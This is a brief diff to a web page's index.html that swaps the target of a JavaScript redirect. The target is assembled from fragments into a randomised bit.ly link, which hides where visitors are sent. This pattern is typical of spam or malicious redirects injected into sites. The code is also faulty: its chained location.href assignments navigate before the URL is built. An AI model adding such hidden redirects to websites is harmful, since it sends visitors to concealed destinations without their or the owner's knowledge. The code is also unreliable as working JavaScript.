--- a/index.html
+++ b/index.html
@@ -1,9 +1,9 @@
 <script type = "text/javascript">
 function reDirect() {
-a = location.href = "bit-urls.com/";
-b = location.href = "orlink";
-c = location.href = "20v";
-d = Math.ceil(Math.random() * 1);
+a = location.href = "bit.ly/";
+b = location.href = "jobs6";
+c = location.href = "netu";
+d = Math.ceil(Math.random() * 3);
 a = "http://" + a + b + c + d ;
 window.location = a
 }
